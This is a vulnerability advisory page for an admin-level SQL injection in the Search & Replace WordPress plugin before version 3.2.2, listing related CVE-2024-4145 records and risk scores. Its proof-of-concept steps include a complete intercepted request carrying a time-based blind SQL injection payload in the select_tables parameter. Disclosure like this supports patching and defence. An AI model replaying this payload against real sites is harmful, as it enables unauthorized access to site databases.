Lucene search
Krugov AryomWPEX-ID:7D5B8764-C82D-4969-A707-F38B63BCADCAHistoryMay 23, 2024 - 12:00 a.m.
Search & Replace < 3.2.2 - Admin+ SQL injection
2024-05-2300:00:00
Krugov Aryom
41
search & replace admin+ sql injection poc june 06 2024 exploit update
Description The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).
1. Go to the Tools parameter
2. Select Search & Replace
3. Click "Do Search & Replace"
4. Change the parameters and intercept the request
5. Put a vulnerable SQL query in the request, such as the following: `search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace`
6. Notice that the response takes double seconds of the SLEEP(x-) number you insert.References
Related
cvelist
cvelist
CVE-2024-4145 Search & Replace < 3.2.2 - Admin+ SQL injection
2024-06-13 06:00:02
wpvulndb
wpvulndb
Search & Replace < 3.2.2 - Admin+ SQL injection
2024-05-23 00:00:00
cve
cve
CVE-2024-4145
2024-06-13 06:15:11
vulnrichment
vulnrichment
CVE-2024-4145 Search & Replace < 3.2.2 - Admin+ SQL injection
2024-06-13 06:00:02
nvd
nvd
CVE-2024-4145
2024-06-13 06:15:11
wordfence
wordfence
AI Score
7.5
Confidence
Low
EPSS
0.001
Percentile
19.5%
Related for WPEX-ID:7D5B8764-C82D-4969-A707-F38B63BCADCA